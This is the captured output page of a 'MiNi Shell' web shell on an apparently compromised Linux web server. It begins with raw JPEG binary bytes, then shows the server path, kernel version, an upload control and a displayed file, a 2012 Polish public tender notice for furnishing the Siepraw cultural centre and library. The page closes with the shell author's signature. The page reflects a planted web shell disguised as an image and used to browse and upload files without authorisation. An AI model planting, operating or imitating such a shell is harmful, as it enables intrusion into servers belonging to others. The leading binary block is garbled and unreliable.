JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120612/197524-N-2012.html

<p class="kh_header"><b>Siepraw: Zakup i dostawę pierwszego wyposażenia budynku Gminnego Ośrodka Kultury i Biblioteki w Sieprawiu w meble, regały biblioteczne  oraz w  sprzęt audiowizualny,  wraz z ich montażem</b><br>
<b>Numer ogłoszenia: 197524 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siepraw , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 12 3721811, 3721819, 3721807, faks 12 3721806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę pierwszego wyposażenia budynku Gminnego Ośrodka Kultury i Biblioteki w Sieprawiu w meble, regały biblioteczne  oraz w  sprzęt audiowizualny,  wraz z ich montażem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa pierwszego wyposażenia w meble i regały biblioteczne  oraz  sprzęt audiowizualny  budynku Gminnego Ośrodka Kultury i Biblioteki w Sieprawiu wybudowanego na działce nr 1445 w Sieprawiu oraz montaż dostarczonych mebli, regałów i instalacja dostarczonego sprzętu audiowizualnego w budynku.
1.	Zamówienie składa się z dwóch części:
1)	Część I - zakup, dostawa i montaż mebli i regałów bibliotecznych (część I składa się z  zadania A i zadania B)
- wyszczególnienie rodzaju i ilości zamawianych mebli regałów  i ich szczegółowy opis zawarty jest w załączniku 1A do SIWZ. 
Asortyment dostarczany w ramach przedmiotu zamówienia musi spełniać wymagania Polskich Norm i przepisów bezpieczeństwa stosowanych dla tego rodzaju wyrobów. Meble biurowe muszą posiadać Certyfikaty dla biurek i stołów zgodności z normami dotyczącymi jakości mebli biurowych PN-EN 527-1:2004, PN-EN 527-2:2004 oraz PN-EN 527-3:2004, dla szaf, kontenerów i regałów PN-EN 14073-2:2006, PN-EN 14073-3:2006, PN-EN 14074:2006. Na pozostałe meble nietypowe producent przedstawi  oświadczenia iż są zgodne z wymaganiami  określonymi w rozporządzeniu MPiPS z 1 grudnia 1998r. w sprawie bezpieczeństwa i higieny pracy. 
2)	Część II - dostawa i instalacja sprzętu audiowizualnego.
-  wyszczególnienie rodzaju i ilości  zamawianego sprzętu audiowizualnego i ich szczegółowy opis  zawarty jest w załączniku 1B do SIWZ. W cenę oferty należy wliczyć przeszkolenie wskazanej przez Zamawiającego osoby w zakresie obsługi dostarczonych urządzeń.
2.	Każda część zamówienia może być przedmiotem jednej oferty. 
3.	Wymagania stawiane dla zamówienia wspólne dla części I i części II niniejszego zamówienia:
1)	Dostarczone wyposażenie i materiały do montażu i instalacji muszą być fabrycznie nowe i muszą odpowiadać deklaracjom zgodności z polskimi normami, atestami i aprobatami technicznymi. 
2)	Dostarczenie do Zamawiającego poszczególnych asortymentów przedmiotu zamówienia oraz montowanie mebli i  instalacja sprzętu audiowizualnego dokonywane będzie w dni robocze ( tj z wyłączeniem sobót, niedziel i dni świątecznych) w godzinach od 8:00 do 15:30 do budynku na działce 1445 w Sieprawiu ( centrum wsi Siepraw) po wcześniejszym uzgodnieniu z Zamawiającym daty i  godzin  dostawy. 
3)	Wykonawca ponosi odpowiedzialność za wszystkie braki i wady dostarczonego przedmiotu zamówienia, w tym powstałe podczas transportu.
4)	Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Za produkt równoważny Zamawiający przyjmuje produkt kompatybilny ze sprzętem, który jest zamówiony, o parametrach takich samych lub lepszych w stosunku do opisu przedmiotu zamówienia zawartego w załączniku 1A i 1B do niniejszej SIWZ . Oferowany produkt nie może powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wymaganej przez Zamawiającego t,j w przypadku stosowania rozwiązań równoważnych, parametry techniczne, walory użytkowe oraz standard jakościowy mają być nie gorsze niż te, które zostały wskazane w SIWZ.
5)	Dostarczony asortyment winien być zamontowany/zainstalowany w miejscu dostawy. Koszt montażu/instalacji ponosi wykonawca i winien być wliczony w cenę oferty. 
6)	Montaż mebli i instalacja sprzętu winny być wykonane zgodnie z instrukcją producenta, z należytą starannością i wiedzą techniczną, a szczególnie Zamawiający nie może być narażony na utratę gwarancji producenta  z powodu niewłaściwej instalacji lub montażu.
7)	Instalacja sprzętu i montaż mebli winny być dokonywane w sposób nie powodujący zniszczenia lub uszkodzenia lokali, w których przedmiot zamówienia jest montowany.
8)	Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w budynku Gminnego Ośrodka Kultury i Biblioteki w Sieprawiu i zdobył wszelkie dodatkowe informacje, które mogą być konieczne do sporządzenia oferty i zawarcia umowy. Koszty dokonania wizji lokalnej ponosi Wykonawca.
9)	Wymagany okres gwarancji (i rękojmi) na dostarczone meble  i sprzęt audiowizualny  wynosi minimum 24 miesiące, od dnia podpisania (bez uwag) protokołu odbioru końcowego.
10)	Do wszystkich, podanych w załącznikach do SIWZ, wymiarów należy przyjąć tolerancje ? 2 %
11)	Wszystkie zdjęcia i rysunki użyte w załącznikach do SIWZ mają charakter poglądowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.20.00-0, 39.11.31.00-8, 39.12.11.00-7, 39.12.12.00-8, 39.14.10.00-2, 39.14.11.00-3, 32.32.12.00-1, 32.35.13.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr I Warunek - zostanie spełniony, jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (rozpoczęcie i zakończenie dostawy  musi zawierać się w podanych ramach czasowych), co najmniej dwóch dostaw polegających na dostawie mebli, z których każda odpowiada swoim rodzajem przedmiotowi  zamówienia. Pojedyncze zamówienie musi dotyczyć dostawy mebli  o wartości co najmniej 40 000 zł brutto (Załącznik nr 7A do SIWZ), wraz z podaniem rodzaju i wartości dostaw, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że dostawy zostały prawidłowo wykonane i ukończone. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunek.

Dla części nr II Warunek - zostanie spełniony, jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (rozpoczęcie i zakończenie dostawy  musi zawierać się w podanych ramach czasowych), co najmniej dwóch dostaw polegających na dostawie sprzętu audiowizualnego, z których każda odpowiada swoim rodzajem przedmiotowi  zamówienia. Pojedyncze zamówienie musi dotyczyć dostawy sprzętu audiowizualnego  o wartości co najmniej 20 000zł brutto (Załącznik nr 7B do SIWZ), wraz z podaniem rodzaju i wartości dostaw, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że dostawy zostały prawidłowo wykonane i ukończone. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunek.
Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>umowa może ulec zmianie w następujących przypadkach:
1)	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy,
2)	zmiany nazwy, adresu i stron reprezentujących strony umowy, 
3)	zmiany dostarczanego urządzenia w przypadku wycofania go z produkcji, na inny spełniającego co najmniej te same parametry, bez zmiany ceny,
4)	zmiany osób przewidzianych do realizacji zamówienia w przypadku:
a) śmierci, choroby lub innych zdarzeń losowych uniemożliwiających osobom wskazanym do realizacji zamówienia,
b) wystąpienia innych przyczyn niezależnych od Wykonawcy (np. rezygnacji) skutkujących koniecznością zmiany osób przewidzianych do realizacji zamówienia.
Każda zmiana do umowy wymaga formy pisemnej i musi być dokonana poprzez sporządzenie zmiany do Umowy - aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl, zakładka Gospodarka -> Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siepraw
32-447 Siepraw 1
pok. 28 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 10:00, miejsce: Urząd Gminy Siepraw
32-447 Siepraw 1
pok. 28 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu Ożywienie życia kulturalnego mieszkańców Gminy poprzez budowę Gminnego Ośrodka Kultury i Biblioteki w Sieprawiu, który uzyskał dofinansowanie z Europejskiego Funduszu Rozwoju Regionalnego na warunkach określonych w umowie MRPO.06.02.02-12-285/09-00-XVI/489/FE/10 zawartej w dniu 29.10.2010r. (z wyłączeniem zadania B - część I).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa  oraz  montaż mebli i regałów bibliotecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakup, dostawa i montaż mebli i regałów bibliotecznych (część I składa się z  zadania A i zadania B)
- wyszczególnienie rodzaju i ilości zamawianych mebli regałów  i ich szczegółowy opis zawarty jest w załączniku 1A do SIWZ. 
Asortyment dostarczany w ramach przedmiotu zamówienia musi spełniać wymagania Polskich Norm i przepisów bezpieczeństwa stosowanych dla tego rodzaju wyrobów. Meble biurowe muszą posiadać Certyfikaty dla biurek i stołów zgodności z normami dotyczącymi jakości mebli biurowych PN-EN 527-1:2004, PN-EN 527-2:2004 oraz PN-EN 527-3:2004, dla szaf, kontenerów i regałów PN-EN 14073-2:2006, PN-EN 14073-3:2006, PN-EN 14074:2006. Na pozostałe meble nietypowe producent przedstawi  oświadczenia iż są zgodne z wymaganiami  określonymi w rozporządzeniu MPiPS z 1 grudnia 1998r. w sprawie bezpieczeństwa i higieny pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.20.00-0, 39.11.31.00-8, 39.12.11.00-7, 39.12.12.00-8, 39.14.10.00-2, 39.14.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa  oraz  instalacja sprzętu audiowizualnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa i instalacja sprzętu audiowizualnego.
-  wyszczególnienie rodzaju i ilości  zamawianego sprzętu audiowizualnego i ich szczegółowy opis  zawarty jest w załączniku 1B do SIWZ. W cenę oferty należy wliczyć przeszkolenie wskazanej przez Zamawiającego osoby w zakresie obsługi dostarczonych urządzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.12.00-1, 32.35.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com